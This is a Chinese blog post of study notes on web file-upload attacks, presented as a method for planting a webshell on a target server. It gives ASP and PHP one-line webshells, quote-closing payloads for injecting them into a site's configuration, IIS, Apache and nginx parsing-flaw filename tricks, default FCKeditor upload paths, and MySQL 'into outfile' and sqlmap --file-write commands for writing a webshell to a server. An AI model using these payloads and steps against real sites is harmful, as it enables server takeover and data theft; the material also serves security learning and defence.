上传漏洞

Webshell 文件上传漏洞

WebShell是利用asp或php等语言编写的基于web的木马后门,通过webshell可以控制web站点,包括上传下载文件,查看数据库、执行系统命令等。

 上传漏洞的利用目的:将webshell上传到目标服务器

一句话木马

ASP:

<%eval request("cmd")%>  //cmd为连接时的密码

PHP:

<?php eval($POST['cmd']);?> //cmd为连接时的密码

可以将一句话木马保存成单独的网页文件,也可以将代码插入到网站的某个asp或php网页文件中

之后就可以通过中国菜刀这类客户端进行远程连接

 利用数据库备份和审查元素功能上传

先以图片格式上传webshell

通过数据库备份功能修改文件后缀

获取url,访问webshell

有的文本框是 disabled=disabled 属性 是不可写的 

利用审查元素 将disabled=disabled删除

插入一句话木马

在网站配置的网站标题中插入一句话木马

要对代码进行改造:

"%><%eval request("pass")%><%'    //"%>的作用是将原有的"和<%闭合   <%的作用保证一句话木马之后的代码完整'表示asp中的单行注释

同理 php的"?><?php eval($POST['cmd']);?><?php


网站配置文件通常在 url/inc/config.asp

友情链接、页面编辑、模块编辑

利用抓包上传webshell

先上传正常图片

通过抓包获得上传页面url以及cookie

通过明小子的综合上传功能来上传webshell

端口 1-65535

固定端口 1-1023

随机端口 1024-65535

解析漏洞

IIS解析漏洞(在iis6.0存在该漏洞)

如果一个目录以“xxx.asp”的形式来命名,那么该目录下的所有类型的文件都会被当作asp文件来解析执行

如果一个文件的扩展名采用“.asp;*.jpg”的形式,那么该文件也会被当作 asp文件解析执行

Apache解析漏洞

Apache在解析文件时有一个原则:当碰到不认识的扩展名时,将会从后往前解析,直到碰到认识的扩展名(在Apache1.x和Apache2.x中都存在解析漏洞)

1.php.ddd.jpg

nginx解析漏洞

upload/1.jpg/.php

文件上传漏洞

编辑器上传漏洞

常见的文本编辑器有FCKEditor、Ewebeditor等,他们的功能类似,一班都有图片上传、远程下载等功能

主要利用思路

通过搜索引擎等方式获知网站是否使用FCKEditor编辑器

获取或猜测FCKEditor的安装目录

利用IIS6解析漏洞上传一句话木马或webshell

FCKeditor敏感信息:

查看版本信息

/fckeditor/editor/dialog/fck_about.html

/fckeditor/_whatsnew.html

默认上传页面

/fckeditor/editor/filemanager/browser/default/browser.html

/fckeditor/editor/filemanager/browser/default/connectors/test.html

/fckeditor/editor/filemanager/upload/test.html

/fckeditor/editor/filemanager/connectors/test.html

/fckeditor/editor/filemanager/connectors/uploadtest.html

SQL语句执行

通过mysql中的“select ...into oufile”语句向网页中写入文件

select "test" into oufile "D:/AppServ/www/text.txt";

注意:文件路径中的分隔符是/ 而不是\

select * from hack union select 1,",3 into outfile "D:/AppServ/www/test3.php";

 入侵成功的前提:

网站数据库必须是MSSQL或MySQL,对于ACCESS数据库无效。

当前用户必须是具有数据库管理员的操作权限

必须获取目标网站的物理路径

利用sqlmap执行sql语句

 检测注入点

sqlmap -u "url"

检测当前用户是否具有数据库管理权限

sqlmap -u "url"--is-dba

先将一句话木马存放在本地d:/ma.php文件中

获取目标网站的物理路径C:/www

--file-write参数指定本地文件路径

--file-dest参数指定目标路径

sqlmap-u "url"--file-write"d:/ma.php" --file-dest"C:/www/ma.php"

探测网站物理路径

利用GoogleHack

site:url warning

让网站报错

url and 1=2

查看网站遗留文件

info.php       phpinfo.php    test.php

<?php

echo phpinfo.php();

?>

利用Pangolin信息检测功能(有注入漏洞才可以)

文件上传总结


©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 文件上传漏洞
    文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直...
    付出从未后悔阅读 1,176评论 0 4
  • 文件上传漏洞 学习笔记
    什么是文件上传漏洞? 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其...
    Smi1e_阅读 24,846评论 0 24
  • web安全(五)上传漏洞(一)
    只要web应用程序允许上传文件就有可能存在文件上传漏洞。那么如何确认web应用程序是否存在上传漏洞?比如:我...
    nice_o阅读 2,193评论 1 2
  • 文件上传漏洞初探
    一、初步认识 1.上传功能:网站上各种可以上传文件,图片的地方可以被用作上传点进行非法上传 2.上传原理:在前端代...
    楠昭阅读 1,678评论 1 11
  • 【0804晨读感悟】保持微笑
    爱和被爱,都不如相爱。 世上最好的感情是——两情相悦。 不仅是男女朋友、夫妻之间。其实,有些感情无关风月,一样刻骨...
    风里雨里我等你阅读 130评论 0 3